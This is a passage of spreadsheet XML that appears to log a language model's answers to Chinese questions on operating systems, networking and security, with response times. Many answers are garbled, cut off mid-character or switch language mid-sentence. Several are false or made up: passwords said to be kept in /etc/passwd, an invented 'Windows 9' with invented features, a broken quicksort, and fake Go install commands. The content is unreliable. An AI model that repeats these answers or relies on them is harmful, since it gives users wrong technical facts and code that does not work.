      <c r="C95" t="inlineStr">
        <is>
          <t>？
STIX（Structured Threat Information Expression）是一种用于描述和分类cybersecurity threats的标准。STIX标准中提供了一种用于定义Attack Pattern的结构，具体如下：
1. Attack Pattern Definition:
Attack Pattern Definition是一个Json对象，用于描述一个攻击模式。它包含以下几个部分：
* Name: 描述攻击模式的唯一名称。
* Description: 描述攻击模式的描述。
* Attack Pattern Type: 描述攻击模式的类型，例如， phishing、password-spraying等。
* Attack Pattern Subtype: 描述攻击模式的子类型，例如，spear phishing、whaling等。
* Attack</t>
        </is>
      </c>
      <c r="D95" t="n">
        <v>5.456680774688721</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="1" t="n">
        <v>94</v>
      </c>
      <c r="B96" t="inlineStr">
        <is>
          <t>主流的操作系统有哪些</t>
        </is>
      </c>
      <c r="C96" t="inlineStr">
        <is>
          <t>？
主流的操作系统有哪些？操作系统是计算机系统的核心 Component，负责管理计算机系统的资源和外围设备，以提供可靠、可扩展、高效的计算机功能。主流的操作系统有哪些？
1. Windows：Windows是最流行的操作系统之一，由微软开发， supports a wide range of hardware platforms and provides a user-friendly interface.
2. macOS：macOS是苹果公司开发的操作系统，适用于苹果电脑和苹果笔记电脑。macOS known for its ease of use and integration with other Apple devices.
3. Linux：Linux是一种开源的操作系统，由多个开发组合共同开发和维护。Linux可以运行在各种�</t>
        </is>
      </c>
      <c r="D96" t="n">
        <v>5.441899061203003</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="1" t="n">
        <v>95</v>
      </c>
      <c r="B97" t="inlineStr">
        <is>
          <t>Linux系统中创建文件夹的命令是什么</t>
        </is>
      </c>
      <c r="C97" t="inlineStr">
        <is>
          <t>？
```
create a folder in Linux system using the command line.
```
&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D97" t="n">
        <v>0.5359494686126709</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="1" t="n">
        <v>96</v>
      </c>
      <c r="B98" t="inlineStr">
        <is>
          <t>Linux系统文件的权限有哪些</t>
        </is>
      </c>
      <c r="C98" t="inlineStr">
        <is>
          <t>？
Linux系统中文件的权限是指对文件的访问控制。Linux系统中的文件权限有哪些？下面是Linux系统中常见的文件权限：
1. Read (r)：允许读取文件内容，但不允许修改或删除。
2. Write (w)：允许写入文件，但不允许读取或删除。
3. Execute (x)：允许执行文件，但不允许读取或写入。
4. Setuid (s)：允许设置uid，即文件的owner可以设置其他用户的uid。
5. Setgid (s)：允许设置gid，即文件的group可以设置其他组的g</t>
        </is>
      </c>
      <c r="D98" t="n">
        <v>5.450968503952026</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="1" t="n">
        <v>97</v>
      </c>
      <c r="B99" t="inlineStr">
        <is>
          <t>如何查看Linux系统的IP地址</t>
        </is>
      </c>
      <c r="C99" t="inlineStr">
        <is>
          <t>？
在Linux系统中，可以使用不同的命令来查看系统的IP地址。以下是一些常用的命令：
1. 使用`ifconfig`命令
使用`ifconfig`命令可以查看系统的网络卡IP地址。例如，要查看eth0网络卡的IP地址，可以使用以下命令：
```
ifconfig eth0
```
2. 使用`ip addr`命令
使用`ip addr`命令可以查看系统的IP地址。例如，要查看系统的IP地址，可以使用以下命令：
```
ip addr
```
3. 使用`cat /etc/network/interfaces`命令
 `/etc/network/interfaces` 文件中包含了系统的网络配置信息，包括IP地址。可以使用`cat`命令来查看该文件中的内容</t>
        </is>
      </c>
      <c r="D99" t="n">
        <v>5.449135541915894</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="1" t="n">
        <v>98</v>
      </c>
      <c r="B100" t="inlineStr">
        <is>
          <t>linux用户的密码保存在什么文件中</t>
        </is>
      </c>
      <c r="C100" t="inlineStr">
        <is>
          <t>？
--------------------------------------------------------------------------------
Linux 系统中的用户密码通常是通过 `/etc/passwd` 文件进行保存的。这个文件包含了所有 Linux 系统中的用户帐户，包括用户名、密码、用户组等信息。每个用户的密码都会被加密并存储在这个文件中，以确保安全性和隐私。
在 Linux 系统中， `/etc/passwd` 文件是一个非可读可写文件，这意味着它只能由系统管理员或者 root 用户访问和修改。这样可以确保用户的密码安全性和隐私。
如果您想知道 Linux 系统中哪些用户的密码是，您可以使用 `getent passwd` 命令来查看 `/etc/passwd</t>
        </is>
      </c>
      <c r="D100" t="n">
        <v>5.457918882369995</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="1" t="n">
        <v>99</v>
      </c>
      <c r="B101" t="inlineStr">
        <is>
          <t>vi编辑器如何编辑、保存和退出</t>
        </is>
      </c>
      <c r="C101" t="inlineStr">
        <is>
          <t>？
vi编辑器是一款功能rich的文本编辑器，它具有灵活的命令和组合键，可以帮助您快速地编辑文本文件。以下是一些基本的编辑、保存和退出操作：
编辑：
1. 输入 vi editor：在终端中输入 `vi` 命令，将您的文本文件打开。
2. 使用键盘命令：vi 编辑器具有灵活的键盘命令，可以帮助您快速地进行编辑。例如，您可以使用 `d` 键删除一行，`dd` 键删除多行，`y` 键替换一行，`yy` ����</t>
        </is>
      </c>
      <c r="D101" t="n">
        <v>5.454006433486938</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="1" t="n">
        <v>100</v>
      </c>
      <c r="B102" t="inlineStr">
        <is>
          <t>如何给linux系统配置静态IP</t>
        </is>
      </c>
      <c r="C102" t="inlineStr">
        <is>
          <t>地址？
在Linux系统上配置静态IP地址可以通过以下方式进行：
1. 使用`ifconfig`命令
在终端中输入`ifconfig`命令，可以查看当前的网卡和其他网络配置。要配置静态IP地址，可以使用以下命令：
```
sudo ifconfig eth0 alias 192.168.1.100
```
其中`eth0`是Linux系统中的网卡名称，`192.168.1.100`是静态IP地址。
2. 使用`ip`命令
`ip`命令是Linux系统中用于配置网络参数的命令。可以使用以下命令来配置静态IP地址：
```
sudo ip addr add 192.168.1.100/24 dev eth0</t>
        </is>
      </c>
      <c r="D102" t="n">
        <v>5.45368504524231</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="1" t="n">
        <v>101</v>
      </c>
      <c r="B103" t="inlineStr">
        <is>
          <t>什么版本的Windows最安全</t>
        </is>
      </c>
      <c r="C103" t="inlineStr">
        <is>
          <t>？
由于Windows的安全性一直是各种优缺点的话题，因此有很多用户问道什么版本的Windows最安全。本文将根据不同的评估标准和数据分析，回答这个问题。
1. Windows 10
Windows 10 是最新的Windows系统，它在安全方面做了很多改进。Windows 10 采用了多种新的安全功能，例如：
* Windows Defender：一个内置的安全软件，可以检测和清理潜在的威胁。
* Windows Firewall：一个内置的防火墙，可以防止外部访问和禁止不安全的应用程序进行通信。
* Device Guard：一个防止恶意��</t>
        </is>
      </c>
      <c r="D103" t="n">
        <v>5.445790767669678</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="1" t="n">
        <v>102</v>
      </c>
      <c r="B104" t="inlineStr">
        <is>
          <t>如何查看Windows系统的日志</t>
        </is>
      </c>
      <c r="C104" t="inlineStr">
        <is>
          <t>？
Windows系统中的日志是指系统中的各种记录和诊断信息，包括系统错误、应用程序错误、安全事件和网络活动等。可以使用Windows built-in工具来查看系统日志，以下是一些常见的方法：
1. 查看系统日志文件
你可以使用Windows built-in工具来查看系统日志文件，其中包括：
* eventvwr.exe：用于查看系统中的事件日志。你可以使用这个工具来查看系统错误、应用程序错误、安全事件和网络活动等信息。
* eventvwr.msc：用于查看系统中的事件日志。这个工具提供了更多的功能，包括查看系统中</t>
        </is>
      </c>
      <c r="D104" t="n">
        <v>5.799266338348389</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="1" t="n">
        <v>103</v>
      </c>
      <c r="B105" t="inlineStr">
        <is>
          <t>如何查看Windows系统的IP</t>
        </is>
      </c>
      <c r="C105" t="inlineStr">
        <is>
          <t>地址？
Windows系统中可以使用`ipconfig`命令来查看系统的IP地址。
1. 打开命令提示符
	* 在Windows系统中，可以使用“开始”菜单中的“命令提示符”选项来打开命令提示符。
	* 或者，可以直接在“控制面板”中找到“命令提示符”按钮，并click开启。
2. 输入`ipconfig`命令
	* 在命令提示符中输入“ipconfig”命令，回车键后，系统会显示所有网络接口的IP地址。
3. 查看IP地址
	* 查看显示的列表，它包含了所有网络接口的IP地址和其他相关的信息。
	* 具体的IP地址 format 可能会因Windows版本而</t>
        </is>
      </c>
      <c r="D105" t="n">
        <v>5.948945045471191</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="1" t="n">
        <v>104</v>
      </c>
      <c r="B106" t="inlineStr">
        <is>
          <t>Windows系统可以作为服务器系统吗</t>
        </is>
      </c>
      <c r="C106" t="inlineStr">
        <is>
          <t>？
Windows系统可以作为服务器系统，但是需要满足一些系统要求。以下是一些需要注意的事项：
1. 系统需要具备足够的资源，包括硬件资源（如处理器、内存、磁盘空间）和软件资源（如操作系统、服务器软件）。
2. 系统需要具备完善的安全措施，包括 firewalls、防病毒软件、权限管理等。
3. 系统需要具备可靠的备份和恢复机制，以确保数据的安全和可用性。
4. 系统需要具备可读性和可�����</t>
        </is>
      </c>
      <c r="D106" t="n">
        <v>5.952571153640747</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="1" t="n">
        <v>105</v>
      </c>
      <c r="B107" t="inlineStr">
        <is>
          <t>Windows 9是什么系统</t>
        </is>
      </c>
      <c r="C107" t="inlineStr">
        <is>
          <t>？ 在下面的文章中，我们将详细介绍Windows 9的特点，以及它如何对 Windows 8 的升级做出贡献。
Windows 9 is the next major release of the Windows operating system, designed to provide a more personalized and intuitive computing experience. It is the successor to Windows 8, and is expected to be released in late 2015 or early 2016.
One of the key features of Windows 9 is its improved Start menu, which will provide users with a more traditional and user-friendly interface. The Start menu will feature a grid of tiles that can be customized to display the applications and files that are most important to the user. Additionally, Windows 9 will include a new feature called "Sets," which will allow users to group their applications and windows into different virtual desktops.
Another major improvement in Windows 9 is its support for desktop apps. Unlike Windows 8, which is primarily designed for touch-based interfaces, Windows 9 will allow users to run desktop applications alongside</t>
        </is>
      </c>
      <c r="D107" t="n">
        <v>5.932950973510742</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="1" t="n">
        <v>106</v>
      </c>
      <c r="B108" t="inlineStr">
        <is>
          <t>木马病毒通常在Windows系统中哪些地方创建启动项</t>
        </is>
      </c>
      <c r="C108" t="inlineStr">
        <is>
          <t>？  
 woodworm virus commonly creates startup items in which parts of the Windows system?
The woodworm virus is a type of malware that can create startup items in various parts of the Windows system. Some common locations where the woodworm virus may create startup items include:
1. Registry: The woodworm virus can modify the Windows Registry to create startup keys and values that launch the virus when the system boots up.
2. Startup folder: The virus can create a folder in the Startup folder of the system, which automatically runs the virus when the system starts.
3. Task Scheduler: The woodworm virus can create tasks in the Task Scheduler to run the virus at startup.
4. AutoRun folders: The virus can create folders in the AutoRun folders of the system, which launch the virus when the system boots up.
5. System files: In some cases, the woodworm virus may modify system files, such as the configuration files of the Windows shell, to create startup items.
It's important to note that the woodworm virus can also create other types of startup items, such as scheduled tasks, keyboard shortcuts, and system</t>
        </is>
      </c>
      <c r="D108" t="n">
        <v>5.946292877197266</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="1" t="n">
        <v>107</v>
      </c>
      <c r="B109" t="inlineStr">
        <is>
          <t>TCP和UDP有什么区别</t>
        </is>
      </c>
      <c r="C109" t="inlineStr">
        <is>
          <t>？
TCP和UDP是两种常用的网络协议，它们之间有许多区别。以下是一些主要的区别：
1. 确认和协议：TCP是一种确认和协议，它在传输数据时会发送确认包，以确保数据的传输正确性。而UDP是一种无确认和协议，它不会发送确认包，因此它的传输速度更快。
2. 错误检测和自己修复：TCP可以检测和自己修复错误，而UDP不能。
3. 连接建立和维护：TCP需要建立连接并维护连接，而UDP不需要建立连接，直接将数据传输。
4</t>
        </is>
      </c>
      <c r="D109" t="n">
        <v>5.934319734573364</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="1" t="n">
        <v>108</v>
      </c>
      <c r="B110" t="inlineStr">
        <is>
          <t>FTP属于TCP/IP模型中的哪一层</t>
        </is>
      </c>
      <c r="C110" t="inlineStr">
        <is>
          <t>？
FTP是一种上下文跨越协調协议，它属于TCP/IP模型的Application层。在TCP/IP模型中，Application层是对于实时传输应用的，包括FTP、SMTP、DNS等。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D110" t="n">
        <v>1.947579383850098</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="1" t="n">
        <v>109</v>
      </c>
      <c r="B111" t="inlineStr">
        <is>
          <t>DNS是明文的还是加密的</t>
        </is>
      </c>
      <c r="C111" t="inlineStr">
        <is>
          <t>？
DNS是明文的，不是加密的。 DNS 是Domain Name System，它是互联网上的域名解析系统。 DNS 将域名译为 IP 地址，这个过程是明文的，也就是说，它不使用加密技术来传输域名和 IP 地址。
当你访问一个域名时，DNS 服务器会尝试解析域名，并将它译为相应的 IP 地址。这个过程是明文的，因为它不需要使用加密技术。
但是，一些 DNS 服务器可能会使用加密技术来保护用户的隐私，例如 DNS over HTTPS（DOH）或 DNS over TLS（DOT）。这些技术可以加密 DNS 数据，以��</t>
        </is>
      </c>
      <c r="D111" t="n">
        <v>5.91628623008728</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="1" t="n">
        <v>110</v>
      </c>
      <c r="B112" t="inlineStr">
        <is>
          <t>HTTP请求头有哪些字段</t>
        </is>
      </c>
      <c r="C112" t="inlineStr">
        <is>
          <t>？
HTTP请求头是一个可选的字符串，用于在HTTP协议中包含附加信息。下面是HTTP请求头的常见字段：
1. `Accept`: 指定客户端能够处理的响应数据格式。
2. `Accept-Language`: 指定客户端的语言设置。
3. `Accept-Encoding`: 指定客户端能够处理的压缩编码方式。
4. `Authorization`: 指定身份验证信息，用于访问 защиited 资源。
5. `Content-Type`: 指定请求体的数据类型。
6. `Cookie`: 指定客户端的 cookie 信息。
7. `Host`: 指定客户端要访问的域名。
8. `If-Modified-Since`: 指定</t>
        </is>
      </c>
      <c r="D112" t="n">
        <v>5.914541006088257</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="1" t="n">
        <v>111</v>
      </c>
      <c r="B113" t="inlineStr">
        <is>
          <t>HTTP响应码有哪些？分表是什么含义</t>
        </is>
      </c>
      <c r="C113" t="inlineStr">
        <is>
          <t>？
HTTP响应码有几种，分表的含义是什么？HTTP响应码是指服务器端返回的一个数字代码，用于告知客户端发送的请求是否成功。HTTP响应码的含义如下：
1xx Informational - 100-199
------------------------
* 100 Continue: 客户端继续发送请求，服务器继续评估。
* 101 Switching Protocols: 服务器继续使用HTTP/1.1协议，客户端需要使用HTTP/1.1协议。
2xx Success - 200-299
------------------------
* 200 OK: 客户端的请求成功，服务器返回请求数据。
* 20</t>
        </is>
      </c>
      <c r="D113" t="n">
        <v>5.930315017700195</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="1" t="n">
        <v>112</v>
      </c>
      <c r="B114" t="inlineStr">
        <is>
          <t>什么是HTTPS</t>
        </is>
      </c>
      <c r="C114" t="inlineStr">
        <is>
          <t>？
HTTPS是Hypertext Transfer Protocol Secure的简写，是一种安全协议，可以使互联网上的通信更加安全和透明。它通过SSL/TLS协议实现了数据加密和身份验证，从而避免攻击者 intercept 和篡改数据。
HTTPS通常用于安全访问敏捷、购物、银行、保健等网站，也可以用于建立安全的内部网络通信。它可以保证数据的完整性和integrity，同时也可以确保用户的隐私和安全。
具体来说，HTTPS的主要特点包括：
1. 数据加密：使用SSL/TLS协议对数据进行</t>
        </is>
      </c>
      <c r="D114" t="n">
        <v>5.911540985107422</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="1" t="n">
        <v>113</v>
      </c>
      <c r="B115" t="inlineStr">
        <is>
          <t>有哪些VPN协议</t>
        </is>
      </c>
      <c r="C115" t="inlineStr">
        <is>
          <t>？
VPN协议是指在VPN连接中使用的协议，它们确定了如何 encrypt 和  переда交换加密的数据。以下是常见的VPN协议：
1. OpenVPN：OpenVPN 是一种开源的 VPN 协议，它使用 TLS 加密和 SSL 加密，可以跨多种网络连接，如 TCP、UDP 和 UNIX 隧道。
2. L2TP/IPSec：L2TP/IPSec 是一种扩展的 VPN 协议，它使用点对点（L2TP）和政策认证（IPSec）加密。L2TP 用于建立虚拟连接，而 IPSec 用于加密数据。
3. PPTP：PPTP（Point-to-Point Tunneling Protocol）是一种</t>
        </is>
      </c>
      <c r="D115" t="n">
        <v>5.92167592048645</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="1" t="n">
        <v>114</v>
      </c>
      <c r="B116" t="inlineStr">
        <is>
          <t>Shadowsocks是什么</t>
        </is>
      </c>
      <c r="C116" t="inlineStr">
        <is>
          <t>？
Shadowsocks是一个开源的跨平台虚拟专用网络（VPN）实现，它是Shadowsocks-Rocket和Shadowsocks-X之间的抽象。Shadowsocks-Rocket是一个基于LibreSSL（前称OpenSSL）的跨平台VPN实现，它支持多种协议，如SOCKS4、SOCKS5、TCP、UDP等。Shadowsocks-X是一个基于TCP掩蔽协议的VPN实现，它可以在TCP协议的基础上实现会话Encryption和掩蔽。
Shadowsocks的主要特点包括：
1. 跨平台支持：Shadowsocks支持多种操作系统，包括Windows、Linux、MacOS等。
2. 多种����</t>
        </is>
      </c>
      <c r="D116" t="n">
        <v>5.924892425537109</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="1" t="n">
        <v>115</v>
      </c>
      <c r="B117" t="inlineStr">
        <is>
          <t>RDP是什么协议</t>
        </is>
      </c>
      <c r="C117" t="inlineStr">
        <is>
          <t>？  
RDP（Remote Desktop Protocol）是一种协议，它允许一个计算机 remotely（远程）连接到另一个计算机，并在其上运行应用程序和操作系统。RDP是一种远程存取协议，它使得用户可以从一个计算机上访问另一个计算机的屏幕、键盘和鼠标，从而在远程计算机上运行应用程序和操作系统。
RDP允许用户通过互联网或者其他网络连接到远程计算机，并在远程计算机上执行任务，例如：
* 访问和操作远程计算机上的文件和应用程序
* 访问和</t>
        </is>
      </c>
      <c r="D117" t="n">
        <v>5.93070125579834</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="1" t="n">
        <v>116</v>
      </c>
      <c r="B118" t="inlineStr">
        <is>
          <t>如何在开发中避免SQL注入漏洞</t>
        </is>
      </c>
      <c r="C118" t="inlineStr">
        <is>
          <t>？
在开发中，避免SQL注入漏洞非常重要，因为它可能会导致敏感数据泄露和安全漏洞。以下是一些有用的建议，可以帮助您避免SQL注入漏洞：
1. 使用parameterized queries：使用parameterized queries可以避免使用直接在SQL语句中传递用户提供的数据。这样可以避免SQL注入漏洞，因为 parameterezed queries不会将用户提供的数据直接传递到SQL语句中。
2. 避免使用rawQuery(): 避免使用rawQuery()方法，因为它会将用户提供的数据直接传递到SQL语句中，容</t>
        </is>
      </c>
      <c r="D118" t="n">
        <v>5.930140495300293</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="1" t="n">
        <v>117</v>
      </c>
      <c r="B119" t="inlineStr">
        <is>
          <t>如何在开发中避免越权漏洞</t>
        </is>
      </c>
      <c r="C119" t="inlineStr">
        <is>
          <t>？
越权漏洞是指在开发过程中，某些人或组织可能会在代码中添加或修改代码，导致整个系统中的漏洞和安全问题。为了避免越权漏洞，可以从以下几个方面进行保障：
1. 强制实施代码质量标准：在开发过程中，需要强制实施一系列的代码质量标准，例如，使用注释、命名规范、类型检查等，以确保代码的可读性和可维护性。
2. 增强代码访问权限：通过设置代码访问权限，使得每个人或组织只能��</t>
        </is>
      </c>
      <c r="D119" t="n">
        <v>5.947397947311401</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="1" t="n">
        <v>118</v>
      </c>
      <c r="B120" t="inlineStr">
        <is>
          <t>如何在开发中避免溢出漏洞</t>
        </is>
      </c>
      <c r="C120" t="inlineStr">
        <is>
          <t>？
在开发中，溢出漏洞是一种常见的安全漏洞，可能会导致数据泄露或者受到恶意攻击。以下是一些避免溢出漏洞的方法：
1. 使用验证和检查：在开发过程中，应该对数据进行验证和检查，以确保它们是正确的和完整的。这可以包括数据验证、input validation、parameter validation等方法。
2. 使用类型检查：使用类型检查可以防止溢出漏洞，例如，在数据存储时，使用适当的类型检查可以防止将错误的数据存储到数据库中</t>
        </is>
      </c>
      <c r="D120" t="n">
        <v>5.968288421630859</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="1" t="n">
        <v>119</v>
      </c>
      <c r="B121" t="inlineStr">
        <is>
          <t>如何避免XSS攻击</t>
        </is>
      </c>
      <c r="C121" t="inlineStr">
        <is>
          <t>？
XSS（Cross-Site Scripting）是一种常见的攻击方式，可以使攻击者在用户的浏览器中执行任何代码。以下是一些避免XSS攻击的方法：
1.  Filter Input：使用HTMLspecialChars()或PHP's filter_var()函数来过滤用户输入，以防止恶意代码被添加到页面。
2.  Validate Input：在接受用户输入时，需要 Validate input，防止输入不正确的代码。
3.  Use Content Security Policy (CSP)： Content Security Policy (CSP) 是一种可以帮助避免 XSS 攻击的机制，它可以帮助保护 webpage 免受攻击。
4.  Use Nonce：Nonces 是一种</t>
        </is>
      </c>
      <c r="D121" t="n">
        <v>5.924100875854492</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="1" t="n">
        <v>120</v>
      </c>
      <c r="B122" t="inlineStr">
        <is>
          <t>网络安全风险三要素指什么</t>
        </is>
      </c>
      <c r="C122" t="inlineStr">
        <is>
          <t>
</t>
        </is>
      </c>
      <c r="D122" t="n">
        <v>5.931114196777344</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="1" t="n">
        <v>121</v>
      </c>
      <c r="B123" t="inlineStr">
        <is>
          <t>网络安全风险评估的主要步骤是什么</t>
        </is>
      </c>
      <c r="C123" t="inlineStr">
        <is>
          <t>？
network security risk assessment is an essential process for organizations to identify and prioritize potential threats to their computer systems and networks. The following are the main steps involved in a network security risk assessment:
1. Identify assets: The first step is to identify the assets that need to be protected, including hardware, software, data, and network resources.
2. Identify threats: The next step is to identify potential threats to the assets, including malware, hackers, insider threats, and natural disasters.
3. Assess vulnerabilities: Once the threats have been identified, the next step is to assess the vulnerabilities of the network and systems to these threats. This involves identifying weaknesses in security protocols, inadequate security measures, and unpatched software.
4. Determine likelihood and impact: Based on the vulnerabilities identified, determine the likelihood of each threat occurring and the potential impact on the organization.
5. Prioritize risks: Prioritize the risks based on their likelihood and impact, to focus on the most critical threats.
6. Develop mitigation strategies: Develop strateg</t>
        </is>
      </c>
      <c r="D123" t="n">
        <v>5.921345472335815</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="1" t="n">
        <v>122</v>
      </c>
      <c r="B124" t="inlineStr">
        <is>
          <t>应急响应的流程是什么</t>
        </is>
      </c>
      <c r="C124" t="inlineStr">
        <is>
          <t>？
应急响应是指在危机或紧急情况下，组织或个人能够快速、有效地应对和解决问题的过程。通常，应急响应需要考虑到诊断、优先级、措施、评估和追踪等方面。以下是一般来说的应急响应流程：
1. 诊断：即识别和评估危机或紧急情况的原因和影响。这个步骤很重要，因为危机或紧急情况的诊断可以决定应急响应的性质和级别。
2</t>
        </is>
      </c>
      <c r="D124" t="n">
        <v>5.913255929946899</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="1" t="n">
        <v>123</v>
      </c>
      <c r="B125" t="inlineStr">
        <is>
          <t>主机中了挖矿木马，如何处置</t>
        </is>
      </c>
      <c r="C125" t="inlineStr">
        <is>
          <t>？
木马是指在主机中植入隐藏的木马软件或黑客软件，通常用于窃取主机的数据或执行恶意操作。如果您发现您的主机中有木马，下面是处置的方法：
1. 停止使用主机：直到您了解您的主机是否已经被木马感染，请停止使用您的主机。
2. 更新软件和操作系统：更新您的软件和操作系统可以帮助防止木马感染。您可以尝试使用软件更新工具来检查和更新您的软件。
3. 使用木马检测软件：您可以使</t>
        </is>
      </c>
      <c r="D125" t="n">
        <v>5.939959049224854</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="1" t="n">
        <v>124</v>
      </c>
      <c r="B126" t="inlineStr">
        <is>
          <t>我的电脑中了勒索病毒，怎么办</t>
        </is>
      </c>
      <c r="C126" t="inlineStr">
        <is>
          <t xml:space="preserve">？
</t>
        </is>
      </c>
      <c r="D126" t="n">
        <v>5.939028978347778</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="1" t="n">
        <v>125</v>
      </c>
      <c r="B127" t="inlineStr">
        <is>
          <t>电脑中毒了怎么办</t>
        </is>
      </c>
      <c r="C127" t="inlineStr">
        <is>
          <t>？computer poisoned how to deal with it?
Computer poisoning is a serious problem that can occur when a computer or other digital device is infected with malware or viruses. This can cause a range of problems, including slow performance, unexpected crashes, and even data theft. If you suspect that your computer has been poisoned, here are some steps you can take to deal with the issue:
1. Disconnect from the internet: Immediately disconnect your computer from the internet to prevent the malware from spreading and causing further damage.
2. Run a virus scan: Use an anti-virus program to scan your computer for any malware or viruses. Make sure to update the virus definitions before running the scan.
3. Use a malware removal tool: There are several free and paid tools available that can help remove malware from your computer. Some popular options include Malwarebytes, SuperAntiSpyware, and HitmanPro.
4. Back up your data: If your computer is infected with malware, it's important to back up your data to an external hard drive or cloud storage service. This will ensure that your files are safe in case the malware</t>
        </is>
      </c>
      <c r="D127" t="n">
        <v>5.946748733520508</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="1" t="n">
        <v>126</v>
      </c>
      <c r="B128" t="inlineStr">
        <is>
          <t>为什么网页打不开了</t>
        </is>
      </c>
      <c r="C128" t="inlineStr">
        <is>
          <t>？
如果您的网页不能打开，这可能是因为以下原因：
1. 网络连接问题：如果您的网络连接不稳定或者没有连接，您可能无法访问网页。
2. 网页下loading问题：如果您正在等待网页下载时，它可能因为网络速度或者服务器问题而无法打开。
3. 浏览器问题：如果您的浏览器不能访问网页，这可能是因为浏览器的问题，例如浏览器的扩展程序或者插件不兼容。
4. 网页过时：如果您访问的网页过时或者不存在，您可能无法打开它</t>
        </is>
      </c>
      <c r="D128" t="n">
        <v>5.945504665374756</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="1" t="n">
        <v>127</v>
      </c>
      <c r="B129" t="inlineStr">
        <is>
          <t>用python写一个快速排序算法</t>
        </is>
      </c>
      <c r="C129" t="inlineStr">
        <is>
          <t xml:space="preserve">
快速排序算法是一种插入排序算法，可以快速地排序数据。以下是一个使用Python实现的快速排序算法：
```
def quicksort(arr):
    if len(arr) &lt;= 1:
        return arr
    else:
        pivot = arr[0]
        less = [x for x in arr[1:] if x &lt;= pivot]
        greater = [x for x in arr[1:] if x &gt; pivot]
        return quicksort(less), quicksort(greater)
```
这个算法使用了插入排序的方式，选择了数组的第一个元素作为排序的枢轴，然后分成两个子数组，一个包含小于排序元素的元素，另一个包含大于排序元素的元素。然后， recursively call the `</t>
        </is>
      </c>
      <c r="D129" t="n">
        <v>5.950037002563477</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="1" t="n">
        <v>128</v>
      </c>
      <c r="B130" t="inlineStr">
        <is>
          <t>使用Java语言将一个对象序列化</t>
        </is>
      </c>
      <c r="C130" t="inlineStr">
        <is>
          <t xml:space="preserve">到ByteArrayOutputStream中
使用Java语言将一个对象序列化到ByteArrayOutputStream中。
public class Serialize {
public static void main(String[] args) throws IOException {
String name = "John";
int age = 25;
Person person = new Person(name, age);
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(person);
System.out.println("Serialized size: " + bos.size());
}
}
Here is the Person class:
public class Person {
public String name;
public int age;
public Person(String name, int age) {
this.name = name;
this.age = age;
}
}
When I run this code, I get the following error:
Exception in thread "main" java.io.NotSerializableException: com.sun.java.swing.plaf.nimbus.NimbusLookAndFeel
at java.io.ObjectOutputStream.writeObject0(ObjectOutputStream.java:1087)
</t>
        </is>
      </c>
      <c r="D130" t="n">
        <v>5.956849575042725</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="1" t="n">
        <v>129</v>
      </c>
      <c r="B131" t="inlineStr">
        <is>
          <t>使用Golang写一个爬虫</t>
        </is>
      </c>
      <c r="C131" t="inlineStr">
        <is>
          <t xml:space="preserve">
### 1. 安装Go语言
首先，您需要安装Go语言。可以使用以下命令在Windows或Linux系统上安装Go：
```
go get -u github.com/golang/go/bin/go
```
### 2. 创建一个爬虫项目
创建一个新的Go语言项目，例如 `spider`，使用以下命令：
```
go create spider/spider.go
```
### 3. 定义网站 URLs 列表
在 `spider.go` 文件中，定义一个名为 `urls` 的数组，其中包含要爬虫的网站 URLs。例如：
```
package main
import (
    "fmt"
    "html/parser"
    "io"
    "log"
    "net/http"
    "strings"
)
func main() {
    urls := []string{
</t>
        </is>
      </c>
      <c r="D131" t="n">
        <v>5.95495343208313</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="1" t="n">
        <v>130</v>
      </c>
      <c r="B132" t="inlineStr">
        <is>
          <t>当采用分块查找时，数据的组织方式是什么</t>
        </is>
      </c>
      <c r="C132" t="inlineStr">
        <is>
          <t>？  
在分块查找中，数据的组织方式是按照键值的顺序排序的。这种方式可以确保查找的速度快，因为可以快速找到需要查找的数据。
具体来说，在分块查找中，数据的组织方式是按照键值的顺序排序的，即将数据按照键值的顺序排序成一个数组，然后在这个数组中查找需要查找的数据。
这种方式的优点是，可以快速找到需要查找的数据，demás，可以避免在大规模数据中进行查找操作时出现的搜索时间间</t>
        </is>
      </c>
      <c r="D132" t="n">
        <v>5.971085548400879</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="1" t="n">
        <v>131</v>
      </c>
      <c r="B133" t="inlineStr">
        <is>
          <t>ElasticSearch搜索一个时间范围的语法是什么</t>
        </is>
      </c>
      <c r="C133" t="inlineStr">
        <is>
          <t xml:space="preserve">？
